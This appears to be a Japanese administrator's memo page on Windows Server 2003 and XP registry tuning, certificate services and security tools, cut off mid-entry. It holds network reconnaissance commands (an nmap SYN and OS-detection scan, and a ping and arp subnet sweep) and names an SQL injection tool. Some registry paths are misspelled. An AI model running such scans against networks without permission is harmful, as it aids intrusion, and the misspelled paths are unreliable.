は持ってたりします。分かりやすい本です。 SQL の LIKE に [] が利用出来る事を最近知った。orz ちなみに、VB でも出来る http://www.microsoft.com/japan/msdn/library/default.asp?url=/japan/msdn/library/ja/vblr7/html/vaoprlike.asp
Windows Server 2003 の シャットダウン イベントの追跡ツール に独自項目を追加するには? レジストリ エディタ (Regedit.exe) を起動します。   次のレジストリ キーを見つけてクリックします。   ※ 1041(言語コード) と言うキーは存在しないので、新しく作成する必要がある。     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVsersion\Reliability\UserDefined\1041     値の名前 : コントロールフラグ;メジャー理由番号;マイナー理由番号     データ型 : REG_MULTI_SZ     値    : タイトルと説明を2行に分けて記述           コントロールフラグ           P: シャットダウンまたは再起動が「計画済み」の場合指定           C: コメント入力必須。 S と併用必須           B: ID の入力を必須とする。 D と併用必須           S: ユーザがシャットダウンを開いた時の理由を表示する場合に指定。 D との併用可能           D: ユーザが予期せずにシャットダウンが開いた時の理由を表示する場合。 S との併用可能           メジャー理由番号           64〜255           マイナー理由番号           0〜65535           ※リスト表示の並べ替えに利用される。           タイトル           理由のタイトルを 64 字以内で記述           説明           理由の説明 を 696 字以内で記述           例)           値の名前 : PS;64;0           値    : 単なるシャットダウン(計画済み)                単にシャットダウンします。
Windows Server 2003 の シャットダウン イベントの追跡ツール から定義済みメニューを削除するには。     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVsersion\Reliability     値の名前 : ShutdownIgnorePredefinedReasons     データ型 : REG_DWORD     値    : 0 ※ 1 にする事でデフォルトの定義済み理由を非表示にする事が可能。     ※ キーは存在しないので、新しく作成する必要がある。 その他  Windows Server 2003 でシャットダウン処理が停止する場合がある  http://support.microsoft.com/kb/913659/ja  Windows Server 2003 ベースのコンピュータが次のエラー メッセージを次に生成し、そして、:"停止する: 0x0000008E "クラッシュする  http://support.microsoft.com/default.aspx?scid=kb;ja;907966
RPC の動的ポート割り当てを構成する方法     HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Internet\     値の名前 : Ports     データ型 : REG_MULTI_SZ     値    : 0 〜 65535 IP ポートの範囲を指定します。 単一のポート ("5984" など) またはポートの範囲 ("5000-5050" など) を文字列で指定     値の名前 : PortsInternetAvailable     データ型 : REG_SZ     値    : Y または N (大文字小文字は区別されません) Y の場合、Ports キーに指定したポートは、そのコンピュータ上でインターネットから使用できるすべてのポートを示す。 N の場合、Ports キーに指定したポートは、インターネットから使用できないすべてのポートを示す。     値の名前 : UseInternetPorts     データ型 : REG_SZ     値    : Y または N (大文字小文字は区別されません) システムのデフォルトのポリシー Y の場合、デフォルト値を使用するプロセスには、事前の定義に従って、インターネットから使用できるポートのセットからポートが割り当てられる。 N の場合、デフォルト値を使用するプロセスには、イントラネット専用ポートのセットからポートが割り当てられる。 以下のキーに Internet キーを追加します。 HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc Internet キーの下に、Ports 値 (REG_MULTI_SZ)、PortsInternetAvailable 値 (REG_SZ)、および UseInternetPorts 値 (REG_SZ) を追加します。 次に示すのは、5000 〜 5020 の範囲のポートを使用する場合の新しいレジストリ キーの例です。 Ports (REG_MULTI_SZ) : 5000-5020 PortsInternetAvailable (REG_SZ) : Y UseInternetPorts (REG_SZ) : Y ※ポートの範囲は、5000 以上で 20 以上の幅を持つように指定する必要があるようです。 参照 [HOWTO] ファイアウォールで動作するように RPC の動的ポート割り当てを構成する方法 HKEY_Local_Machine\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters 使用できるポートの数を増やす     値の名前 : MaxUserPorts     データ型 : REG_DWORD     値    : 20     ※ キーは存在しないので、新しく作成する必要がある。 TIME_WAIT 状態で待機する時間の長さを指定     値の名前 : TcpTimedWaitDelay     データ型 : REG_DWORD     値    : デフォルト 240 秒     ※ キーは存在しないので、新しく作成する必要がある。 再送が何度行われたら接続を中断するかを指定     値の名前 : TcpMaxDataRetransmissions     データ型 : REG_DWORD     値    : デフォルト 5 ※ 3 より小さい値は設定しない。     ※ キーは存在しないので、新しく作成する必要がある。 参照 Windows Server 2003 で RPC エンドポイント マッパーのエラーのトラブルシューティングを行う方法 SQL Server の接続プールが無効の場合に調整が必要な TCP/IP 設定 TCP/IP の最大再送信タイムアウトの変更方法 TIME_WAIT 状態を短くするのはチューニングの基本って事で...
地域レジストリ アジア太平洋地域 APNIC(Asia Pacific Network Information Centre)  日本に割り振られているIP一覧 アメリカ地域 ARIN(American Registry for Internet Numbers)  割り当てリスト ヨーロッパ地域 RIPE NCC(Reseaux IP Europeens Coordination Centre)  割り当てリスト カリブ・ラテンアメリカ地域 LACNIC(The Latin American and Caribbean IP address Regional Registry)  割り当てリスト アフリカ AfriNIC(African Network Information Centre)  割り当てリスト
ネットワーク負荷分散クラスタについて。 調べてないので、この辺りで… ネットワーク負荷分散クラスタ ネットワーク負荷分散 : Windows 2000 および Windows Server 2003 での構成の推奨事例 Windows Server 2003 クラスタの印刷問題のトラブルシューティング方法 Windows Server 2003 でネットワーク負荷分散の TCP/IP を設定する方法 Windows Server 2003 の Windows クラスタ機能のインストールまたはアップグレード後、クラスタ サーバーでドライブへの接続タイムアウトが発生することがある Windows Server 2003 ベースのクラスタ サーバーに対して、より制限の厳しいセキュリティ設定を適用する方法 Windows 2000 および Windows Server 2003 クラスタ ノードをドメイン コントローラとして構成する Windows Server 2003 クラスタで Microsoft 分散トランザクション コーディネータを構成する方法 後編「Web もクラスタ! Windows Network Load Balancing Services」 http://www.microsoft.com/japan/windowsserversystem/virtualserver/community/vol2/page1.mspx Windows Server 2008「フェイルオーバークラスタリング」の効果的な利用法 http://techtarget.itmedia.co.jp/tt/news/0810/22/news01.html  クラスタの実験するには仮想化環境が便利ですね。  仮想化については下の方に書いています。  Windows 2008 でネットワーク負荷分散マネージャに自分しか表示されない場合    アカウントがログオンに失敗しました。  ログオンを失敗したアカウント:  セキュリティ ID: NULL SID  アカウント名: test_nlb  が表示される場合は、コントロールパネル>ユーザアカウント から  ユーザーアカウント制御の有効化または無効化を選択して  「ユーザーアカウント制御(UAC)を使ってコンピュータの保護に役立たせる」  のチェックを外したのち、再起動。  どうも、UAC が悪さしてるっぽ。
Windows XP で TCP/IP をリセットする方法 Windows XP では、NetShell ユーティリティの IP コンテキストで reset コマンドが利用できます。 このコマンドを実行すると、インターネット プロトコル (TCP/IP) によって使用される必要なレジストリ キーを書き換えて、 プロトコルを削除して再インストールしたときと同じ結果を得ることができます。 コマンドのサンプル netsh int ip reset resetlog.txt netsh int ip reset c:\resetlog.txt Windows XP で TCP/IP をリセットする方法 Windows Server 2003 で "インターネット プロトコル (TCP/IP)" をリセットする方法
証明機関をインストールおよび構成する 発行依頼  CertReq c:\certreq.txt ※発行時に必要な番号が表示されるので控えておく。 発行  CertReq -retrieve 1 出来上がったファイルを組み込んで完了。 http://www.zdnet.co.jp/help/howto/win/win2000/0007complus_vb/chap08/36.html に詳しく書かれていましたが、、、 インターネットアーカイブに残ってました。 http://web.archive.org/web/20031205151533/http://www.zdnet.co.jp/help/howto/win/win2000/0007complus_vb/chap08/36.html 設定ファイルを自前で用意して発行する場合は以下が参考になります。 How to enable LDAP over SSL with a third-party certification authority Windows Server 2003 PKI 運用ガイド [IIS]SSL を使用するように Certificate Server を設定する方法 Windows Server 2003、Windows XP、および Windows 2000 に必要な信頼されたルート証明書 Windows Server 2003 または Windows 2000 Server 証明機関により発行される証明書の有効期限を変更する方法 Windows 2000 および Windows Server 2003 証明書サービス Web 登録の構成とトラブルシューティング IIS 6.0 における認証 証明書 CA 証明書の有効期限 - Ask the Network & AD Support Team - Site Home - TechNet Blogs http://blogs.technet.com/b/jpntsblog/archive/2013/10/07/ca.aspx 個人情報保護法時代のIISセキュリティ対策(前編) http://www.atmarkit.co.jp/fwin2k/operation/iisssl01/iisssl01_01.html ●PKIの基礎を理解しよう!PKI基礎講座(1) http://www.atmarkit.co.jp/fnetwork/rensai/pki01/pki01.html 徹底比較 SSLサーバ証明書の「値段」と「品質」 http://nmag.jp/contents/servercertificate/index.html IIS を後からセットアップして、Web登録ページを利用する場合は certutil -vroot ドメインで管理している場合で、内部に証明機関をインストールして リバースプロクシとして利用する場合はSPN に URL を登録する必要がある。 http://www.microsoft.com/japan/technet/windowsserver/2003/technologies/security/webenroll.mspx Web 登録ページを使わない場合は証明機関の拡張機能で、CRL 配布ポイントと機関情報アクセス(AIA) の URL を オンラインになっているサーバで公開するように URL を書き換えて、IIS でアクセスできるように するだけ。CA の書き換えは必要。 ※IIS から証明書の要求をする場合は最大120分待つ必要がある。  また、コンピュータアカウントの証明ストアの信頼するルート証明に証明書をインポートしておく。 Windows Vista、Windows XP、Windows Server 2003、および Windows Server 2008 で認証サーバーを使用する場合に PEAPv0 を構成して、"man-in-the-middle" 攻撃およびパスワード ベースの攻撃に対する潜在的なリスクを低減する方法 http://support.microsoft.com/kb/941123 ネットワーク アクセス保護(NAP)が証明書でない、そして、準拠 Windows Server 2003 ベースのエンタープライズ CA が代替不正のサブジェクト名を持つ証明書を発行します http://support.microsoft.com/kb/943089 個人証明の更新後、証明書が必要なサイトへアクセスした時に同じ物が2つ出てくる場合は、期限切れの方を削除しましょう。  IE の インターネットオプションからコンテンツタブを開いて、証明書ボタンをクリック。  個人タブから該当する証明書を削除。  この手順で削除しても、2つ出てくる場合は  プログラムの実行で「certmgr.msc」と入力  証明書 - 現在のユーザー  - 個人   証明書   ここに過去の証明書が残っているので選択して右クリックから削除 この証明書は有効期限が長いですので、忘れた頃に切れてしまうんですよね。 期限切れには注意しましょう。  ANAのシステム障害、原因は「認証機能の有効期限切れ」  http://www.itmedia.co.jp/news/articles/0809/18/news089.html インターネット インフォメーション サービス 7. 0 で証明書の要求を完了すると、エラー メッセージ:「この証明書ファイルに関連付けられている証明書の要求が見つかりません」 http://support.microsoft.com/kb/931204 エンタープライズPKI導入のススメ ―― [1]独学! 10分でわかるPKI http://www.computerworld.jp/topics/mws/166149.html エンタープライズPKI導入のススメ ―― [2]自力で構築するPKI http://www.computerworld.jp/topics/mws/166589.html SHA256、SHA384、SHA512を選択すると Windows 2003 や XP で不具合が出るようでパッチが出ています。 http://support.microsoft.com/kb/968730/ Server サービスで認証用の拡張保護を実装する更新プログラムについて http://support.microsoft.com/kb/2345886/
APIPAを無効(または有効)にする     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\Tcpip\Parameters     値の名前 : IPAutoconfigurationEnabled     データ型 : DWORD     値    : 無効:0、有効:1     レジストリの書き替え内容     デフォルトではこの「IPAutoconfigurationEnabled」という値は存在しないので、新規に作成する必要がある。     http://www.atmarkit.co.jp/fpc/pctips/019disableapipa2k/disableapipa2k.html
複数の更新プログラムを 1 回の再起動のみでインストールする方法 ここを参考に。 複数の Windows Update または修正プログラムを同時にインストールし、再起動を 1 回で済ませる方法
Windowsコマンド集 マウス ソフトウェア IntelliPoint 5.2 マウス ソフトウェア (Windows XP および Windows 2000 対応) NetEnum LAN内のIPアドレス一覧作成、各種ネットワークコマンド実行 MAC アドレスと IPアドレスの緋も付けは、ping と arp コマンドを交互に利用する事で確認できます。  コマンドラインから   for /l %i in (0,1,255) do ping -w 1 -n 1 192.168.0.%i && arp -a 192.168.0.%i >> arp.log  など 使用中のIPアドレスを調査する 右クリックでハッシュ値を調べるツール Download HashTab v1.9 ヘッダ情報の確認に MiArt HTTP Info Tool TCP/UDPのポート確認に TCPView このサイトは便利なツールがそろっています。 パケットキャプチャ Download version 1.5.2 (freeware) これは優れもの。 EPDエポックパケットディレクター Fiddler HTTP プロトコル解析支援ツール@IEアドオン 先人に聞こう!オススメのネット運用管理ツール 稼働中のコンピュータの監視に ExPing 複数のアドレスに対してPING出来るソフト #エラーを感知したときに外部プログラムを走らせる事が可能です。。 メール送信サンプル ファイルは alertmail.vbs とする。 '*********************************************************** '* Ping に応答しなかった場合メールを送信 '* '* 利用アプリケーション '* ExPing http://www.woodybells.com/ '* BASP21 http://www.hi-ho.ne.jp/babaq/basp21.html '* '* Exping 環境設定 '* 外部プログラムを起動 '*  プログラム: alertmail.vbs '*  オプション: %d %n %e '* '* メールの本文は、 '* Ping の応答がありません。 '* 2005/02/22 12:00:00 '* 61.194.16.124 '* http://www.netdive.jp '* このようになります。 '* ※ 対象 に '* 61.194.16.124 http://www.netdive.jp '* と記述した場合 '*********************************************************** Option Explicit Dim Args Dim BASP Dim i Dim Error Dim mailBody '*********************************************************** '* 初期設定 '*********************************************************** Const MailServer = "mail.netdive.jp" 'メールサーバ Const mailTo = "Webmaster@netdive.jp" '送信元アドレス Const mailSubject = "*** Alert from Exping ***" 'タイトル Const mailFile = "\ExPing.log" '添付ファイル Const mailFrom = "info@netdive.jp" '送信先アドレス '*********************************************************** '* ExPingからパラメータを受け取り本文生成 '*********************************************************** mailBody = "Ping の応答がありません。" Set Args = WScript.Arguments If Args.Count <> 0 Then For i=0 To Args.Count -1 If i=0 Then mailBody = mailBody & vbCrLf & _ Args(i) & " " & Args(i+1) i= i+ 1 ElseIf i>3 Then mailBody = mailBody & Args(i) Else mailBody = mailBody & vbCrLf & Args(i) End If Next End If '*********************************************************** '* メールを送信 '*********************************************************** Set BASP = CreateObject("basp21") Error = BASP.SendMail(Mailserver, mailFrom, mailTo, mailSubject, mailBody, "") 'Error = BASP.SendMail(Mailserver, mailFrom, mailTo, mailSubject, mailBody, mailFile) 'ログを添付する場合 'Wscript.Echo Error '送信出来ない場合のエラー確認 '*********************************************************** '* 終了 '*********************************************************** Set BASP = Nothing Set Args = Nothing Wscript.Quit   BASP を使わないメールの送信の仕方はこっちを参考に。 WindowsでSnortを動かしてみる(Snort+IDScenter) http://www.snort.gr.jp/docs/idscenter/menu.html Snort IDScenter 1.1 日本語マニュアル http://www.snort.gr.jp/transdoc/IDScenter_J/IDScenter_1_1_manual_jp.htm ドキュメント http://www.snort.gr.jp/docs/index.html 翻訳ドキュメント http://www.snort.gr.jp/transdoc/ Microsoft Internet Security and Acceleration (ISA) Server 2004  ※Windows Server 2003 で ISA Server を実行する[HOWTO] Windows Server 2003 上の ISA Server を使用して Web サービスを公開する方法 市販品では、RealSecure BlackICE Server Protection があります。 オフィシャルサイト http://www.blackice.jp/ ウイスルチェックソフト シマンテック マカフィー トレンドマイクロ Sophos F-Secure KASPERSKY CANON SYSTEM SOLUTIONS ALWIL Software (avast! 4) BitDefender Free Edition 7.2 日本語化Windows 2000 または Windows Server 2003 のドメイン コントローラでウイルス スキャンを行う場合の推奨事項[INF] SQL Server を実行しているコンピュータで使用するウイルス対策ツール ポートスキャナツール NetEnum SuperScan NmapWin nmapNT WinPcap(セットで入れておくと良い)  コマンドラインから    nmapnt -v -sS -O 192.168.0.1 > scanlist.txt  で、結果をファイルに格納できる。 アプリケーション脆弱性スキャナ ScanDo WebProbe AppScan WebInspect PrisonMEMO Pro これ買ってみましたが、まだ触ってません… ルートキット検出ソフト RootkitRevealer  コマンドラインから rootkitrevealer.exe -a -c c:\rootkit.log  で、「rootkit.log」というファイルが作成される。 ログ解析 ログアナキング 日本 Analog ユーザ会 Log Parser 2.2 Managed Syslog Server Windows 用のフル機能な syslog サーバ (フリー)説明ページ デバッグツール Debugging Tools for Windows ネットワーク スニッファ検出ツール promqry 1.0 / PromqryUI 1.0 マイクロソフトの Securing Windows 2000 Server ソリューション 第 9 章 ‐ 監査と侵入検出 にも、ツールが載っています。  コンピュータ系blog: セキュリティ アーカイブ  http://kinshachi.ddo.jp/kurage/html/MT/comp/archives/cat_e.html IISツール Internet Information Services (IIS) 6.0 Resource Kit Tools #ツールも収録されている Microsoft Windows Server 2003リソースキット機能編IIS6.0 が役に立ちます。 840671 - IIS 6.0 Resource Kit Tools について パフォーマンスのチェックとか IIS サーバーのパフォーマンスの分析ツール 複数異種のデータベースを同時に管理 DBArtisan # Oracle、Sybase、Microsoft SQL Server、IBM DB2 UDBに対応しています。 その他の管理ツール Microsoft SQL Web Data Administrator MSDE 2000 Partners SQL Server の Guest アカウントと脆弱な sa パスワードチェック SQL Server Audit Utility Official release of SQL Power Injector v1.0 Microsoft Operation Manager  Windows Server 2003 SP1 を実行しているコンピュータに MOM 2005 をインストールすると発生する可能性がある問題について ネットワークの監視(MRTG) MRTG: The Multi Router Traffic Grapher MRTG 公式日本語サイト e2j@mrtg.jpさんによる日本語の翻訳。 MRTG for Intrusion Detection with IIS 6 (SecurityFocus) 「SNMP」「WMI/VBScript」「LogParser/Batch File」を使って IIS サーバの侵入検知をしましょうという話。 Desktop On-Call 携帯でデスクトップ監視が出来るっぽい(VNC みたいな感じ)30日の体験版有り。 サーバ管理者のためのイベントログ運用の基本 てな本を手に入れた。(まだ読んでないけど・・・) Windows Server 2003 で Vrfydsk.exe ツールを使用して、ボリュームをオフライン状態にせずにボリュームのエラーをチェックする方法 http://support.microsoft.com/default.aspx?scid=kb;ja;837326 SSH freeSSHd (Windows上で動作する SSH サーバ) Windows用定番SSHクライアント「Tera Term」の使い方 http://sourceforge.jp/magazine/09/02/02/0412259 Windows Script Decoder http://fw.moongift.jp/intro/i-1539.html Windows Script Encoder でエンコードされたスプリクトをデコードするソフト。 一通りセット SPACE TAG http://www.spacetag.jp/modules/download/ Apach、MySQL、PostgreSQL、BIND、XMAIL、PHP、Perl など一括インストール可能なパッケージが用意されています。 64bitアプリ関連 マイクロソフト、「Windows Media Encoder 9」の64bit版を公開 「Daemon Tools」v4の64ビットWindows対応版が公開 IntelliType Pro 5.5 キーボード ソフトウェア (Windows) IntelliPoint 5.5 マウス ソフトウェア Windows EmEditor Professional v5 x64ネイティブ、NAC Version2に対応した「ウイルスバスター コーポレートエディション 7.3」を発表 キヤノンシステムソリューションズ、 Windows x64 Editionにネイティブ対応した『NOD32アンチウイルス64ビット版』 を6月に発売――先行モニター受け付けを開始   32ビット・アプリケーションでも利点がある   http://itpro.nikkeibp.co.jp/article/COLUMN/20051118/224849   32ビットの実行性能がよい秘密   http://itpro.nikkeibp.co.jp/article/COLUMN/20051118/224885   マシン語の一部が32ビットと異なる   http://itpro.nikkeibp.co.jp/article/COLUMN/20051121/224935   安心してx64に移行するためのポイント   http://itpro.nikkeibp.co.jp/article/COLUMN/20051124/225118   既存のソースを64ビットに移植する   http://itpro.nikkeibp.co.jp/article/COLUMN/20051124/225141   不要なレジストリキーを削除するツール NTREGOPT http://www.larshederer.homepage.t-online.de/erunt/index.htm その他  開発用通信プロトコルコンポーネント「IP*Works!」  http://cgi.itmedia.co.jp/tt/3495/20060411/tt/news/0604/10/news03.html  HTTP,FTP,POP,IMAP,WebDAV,XMLなどの主要プロトコルコンポーネント。 ASP から利用できるみたい。  米Microsoft、Webコンテンツセキュリティ技術「Web Sandbox」をオープンソースに  http://sourceforge.jp/magazine/09/01/29/0437200
Internet Explorer のアドオンを無効化(XP SP2)     HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions     値の名前 : NoExtensionManagement     データ型 : DWORD     値    : 無効:0、有効:1     グループポリシーからも設定出来ます。     ファイル名を指定して実行で、gpedit.msc と入力。     [コンピュータの構成]、または [ユーザーの構成] から      [管理用テンプレート]>[Windows コンポーネント]>[Internet Explorer]     「ユーザーによるアドオンの有効化および無効化を許可しない」で設定可能。 Windows XP Service Pack 2 で Internet Explorer のアドオンを管理する方法 Windows XP Service Pack 2 の新機能アドオンの管理について
レジストリの追加設定(Windows Server 2003、Windows XP ) %systemroot%\inf\sceregvl.inf に下記データを追加し「regsvr32 scecli.dll」と入力して SCE DLL を再登録する。 セキュリティ構成エディタを起動すると MSS( Microsoft Solutions for Security の意味で、このガイドを作成したグループの名前です) というこれらのカスタム レジストリ値が表示されます。多少日本語表示に書き直しています。 キーの説明 RegPath: Includes the registry keypath and value RegType: 1 - REG_SZ, 2 - REG_EXPAND_SZ, 3 - REG_BINARY, 4 - REG_DWORD, 7 - REG_MULTI_SZ Display Name: Is a localizable string defined in the [strings] section Display type: 0 - boolean, 1 - Number, 2 - String, 3 - Choices, 4 - Multivalued, 5 - Bitmask Options: If Displaytype is 3 (Choices) or 5 (Bitmask), then specify the range of values and corresponding display strings in value|displaystring format separated by a comma. [Register Registry Values] に追加 ;========================= MSS Values ========================== MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\EnableICMPRedirect,4,%EnableICMPRedirect%,0 MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\SynAttackProtect,4,%SynAttackProtect%,3,0|%SynAttackProtect0%,1|%SynAttackProtect1%,2|%SynAttackProtect2% MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\EnableDeadGWDetect,4,%EnableDeadGWDetect%,0 MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\EnablePMTUDiscovery,4,%EnablePMTUDiscovery%,0 MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\KeepAliveTime,4,%KeepAliveTime%,3,150000|%KeepAliveTime0%,300000|%KeepAliveTime1%,600000|%KeepAliveTime2%,1200000|%KeepAliveTime3%,2400000|%KeepAliveTime4%,3600000|%KeepAliveTime5%,7200000|%KeepAliveTime6% MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableIPSourceRouting,4,%DisableIPSourceRouting%,3,0|%DisableIPSourceRouting0%,1|%DisableIPSourceRouting1%,2|%DisableIPSourceRouting2% MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\TcpMaxConnectResponseRetransmissions,4,%TcpMaxConnectResponseRetransmissions%,3,0|%TcpMaxConnectResponseRetransmissions0%,1|%TcpMaxConnectResponseRetransmissions1%,2|%TcpMaxConnectResponseRetransmissions2%,3|%TcpMaxConnectResponseRetransmissions3% MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\TcpMaxDataRetransmissions,4,%TcpMaxDataRetransmissions%,1 MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\PerformRouterDiscovery,4,%PerformRouterDiscovery%,0 MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\TCPMaxPortsExhausted,4,%TCPMaxPortsExhausted%,1 MACHINE\System\CurrentControlSet\Services\Netbt\Parameters\NoNameReleaseOnDemand,4,%NoNameReleaseOnDemand%,0 MACHINE\System\CurrentControlSet\Services\Eventlog\Security\WarningLevel,4,%WarningLevel%,3,50|%WarningLevel0%,60|%WarningLevel1%,70|%WarningLevel2%,80|%WarningLevel3%,90|%WarningLevel4% MACHINE\System\CurrentControlSet\Services\AFD\Parameters\DynamicBacklogGrowthDelta,4,%DynamicBacklogGrowthDelta%,1 MACHINE\System\CurrentControlSet\Services\AFD\Parameters\EnableDynamicBacklog,4,%EnableDynamicBacklog%,0 MACHINE\System\CurrentControlSet\Services\AFD\Parameters\MinimumDynamicBacklog,4,%MinimumDynamicBacklog%,1 MACHINE\System\CurrentControlSet\Services\AFD\Parameters\MaximumDynamicBacklog,4,%MaximumDynamicBacklog%,3,10000|%MaximumDynamicBacklog0%,15000|%MaximumDynamicBacklog1%,20000|%MaximumDynamicBacklog2%,40000|%MaximumDynamicBacklog3%,80000|%MaximumDynamicBacklog4%,160000|%MaximumDynamicBacklog5% MACHINE\System\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation,4,%NtfsDisable8dot3NameCreation%,0 MACHINE\System\CurrentControlSet\Control\SessionManager\SafeDllSearchMode,4,%SafeDllSearchMode%,0 MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun,4,%NoDriveTypeAutoRun%,3,0|%NoDriveTypeAutoRun0%,255|%NoDriveTypeAutoRun1% MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ScreenSaverGracePeriod,4,%ScreenSaverGracePeriod%,1   Microsoft Windows Server 2003 TCP/IP 実装詳細   http://www.microsoft.com/japan/technet/prodtechnol/windowsserver2003/technologies/networking/tcpip03.mspx   ここを参考にすれば下記メッセージを日本語化できるかな。 [Strings] に追加 ;================================ MSS Settings =========================== EnableICMPRedirect = "MSS: ICMP着信転送メッセージに応答してルートテーブルの変更を制限する" SynAttackProtect = "MSS: SYN攻撃に対する保護を有効にする" SynAttackProtect0 = "SYN攻撃に対して典型的なプロテクトを行う(デフォルト)" SynAttackProtect1 = "SYN攻撃に対して TcpMaxHalfOpen および TcpMaxHalfOpenRetried の設定値を超えた場合保護する" SynAttackProtect2 = "SYN攻撃に対して最も効率良いプロテクトを行う" EnableDeadGWDetect = "MSS: 停止しているゲートウェイの検出を制限する" EnablePMTUDiscovery = "MSS: 非常に小さな値に断片化されたMTUからの保護" KeepAliveTime = "MSS: TCPがKeep Aliveパケットを送信してアイドル状態の接続がそのままであることを確認する頻度" KeepAliveTime0 ="150000 or 2.5 minutes" KeepAliveTime1 ="300000 or 5 minutes (recommended)" KeepAliveTime2 ="600000 or 10 minutes" KeepAliveTime3 ="1200000 or 20 minutes" KeepAliveTime4 ="2400000 or 40 minutes" KeepAliveTime5 ="3600000 or 1 hour" KeepAliveTime6 ="7200000 or 2 hours (default value)" DisableIPSourceRouting = "MSS: ソース ルーティングの経路を確認する" DisableIPSourceRouting0 = "No additional protection, source routed packets are allowed" DisableIPSourceRouting1 = "Medium, source routed packets ignored when IP forwarding is enabled" DisableIPSourceRouting2 = "Highest protection, source routing is completely disabled" TcpMaxConnectResponseRetransmissions = "MSS:SYN-ACKを転送するときに応答があるまで再送信を試行する回数" TcpMaxConnectResponseRetransmissions0 = "No retransmission, half-open connections dropped after 3 seconds" TcpMaxConnectResponseRetransmissions1 = "3 seconds, half-open connections dropped after 9 seconds" TcpMaxConnectResponseRetransmissions2 = "3 & 6 seconds, half-open connections dropped after 21 seconds" TcpMaxConnectResponseRetransmissions3 = "3, 6, & 9 seconds, half-open connections dropped after 45 seconds" TcpMaxDataRetransmissions = "MSS:接続を切断するまでにTCPが個々のデータ セグメントを再送信する回数" PerformRouterDiscovery = "MSS: RFC1256に基づくルーター検出の実行" TCPMaxPortsExhausted = "MSS: SYN-ATTACK保護の適用を開始するタイミング" NoNameReleaseOnDemand = "MSS: NetBIOS 名を解放しないよう保護する" NtfsDisable8dot3NameCreation = "MSS: 8.3 形式のファイル名を自動生成する" NoDriveTypeAutoRun = "MSS: 全てのドライブの自動起動を無効化する" NoDriveTypeAutoRun0 = "Null, allow Autorun" NoDriveTypeAutoRun1 = "255, disable Autorun for all drives" WarningLevel = "MSS: セキュリティ ログがいっぱいになった場合にイベント エントリに記録するタイミング" WarningLevel0 = "50%" WarningLevel1 = "60%" WarningLevel2 = "70%" WarningLevel3 = "80%" WarningLevel4 = "90%" ScreenSaverGracePeriod = "MSS:スクリーンセーバーのパスワード保護をすぐに有効にする" DynamicBacklogGrowthDelta = "MSS:(AFD DynamicBacklog GrowthDelta) Number of connections to create when additional connections are necessary for Winsock applications (10 recommended)" EnableDynamicBacklog = "MSS:動的バックログ機能の利用" MinimumDynamicBacklog = "MSS:リスニングのエンドポイントで許可される最小フリー接続数" MaximumDynamicBacklog = "MSS:リスニングのエンドポイントで許可される最大(準フリー)接続数" MaximumDynamicBacklog0 = "10000" MaximumDynamicBacklog1 = "15000" MaximumDynamicBacklog2 = "20000 (recommended)" MaximumDynamicBacklog3 = "40000" MaximumDynamicBacklog4 = "80000" MaximumDynamicBacklog5 = "160000" SafeDllSearchMode = "MSS:セーフ DLL 検索モードの有効化" ベースライン セキュリティ テンプレートに追加さる項目(値は推奨値)   ■EnableICMPRedirect HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : EnableICMPRedirect データ型 : REG_DWORD 値 : 0 [1]: [有効] 0 : [無効] ■SynAttackProtect HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : SynAttackProtect データ型 : REG_DWORD 値 : 1 1 : 有効 [Connections time-out more quickly if a SYN - ATTACK is detected] [0]: 無効 [No additional protection, use default settings] ■EnableDeadGWDetect HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : EnableDeadGWDetect データ型 : REG_DWORD 値 : 0 [0]: [無効] 1 : [有効] ■EnablePMTUDiscovery HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : EnablePMTUDiscovery データ型 : REG_DWORD 値 : 0 0 : [無効] [1]: [有効] ■KeepAliveTime HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : KeepAliveTime データ型 : REG_DWORD 値 : 300000 150000 : [150000 or 2.5 minutes] 300000 : [300000 or 5 minutes (recommended)] 600000 : [600000 or 10 minutes] 1200000 : [1200000 or 20 minutes] 2400000 : [2400000 or 40 minutes] 3600000 : [3600000 or 1 hour] [7200000]: [7200000 or 2 hours (default value)] 設定可能な値は 1 から 0xFFFFFFFF ■DisableIPSourceRouting HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : DisableIPSourceRouting データ型 : REG_DWORD 値 : 2 1 : [No additional protection, source routed packets are allowed] [0]: [Medium, source routed packets ignored when IP forwarding is enabled] 2 : [Highest protection, source routing is completely disabled] ■TcpMaxConnectResponseRetransmissions HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : TcpMaxConnectResponseRetransmissions データ型 : REG_DWORD 値 : 2 0 : [No retransmission, half-open connections dropped after 3 seconds] 1 : [3 seconds, half-open connections dropped after 9 seconds] [2]: [3 & 6 seconds, half-open connections dropped after 21 seconds] 3 : [3, 6, & 9 seconds, half-open connections dropped after 45 seconds] 設定可能な値は 0 から 0xFFFFFFFF ■TcpMaxDataRetransmissions HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : TcpMaxDataRetransmissions データ型 : REG_DWORD 値 : 3 [5] : 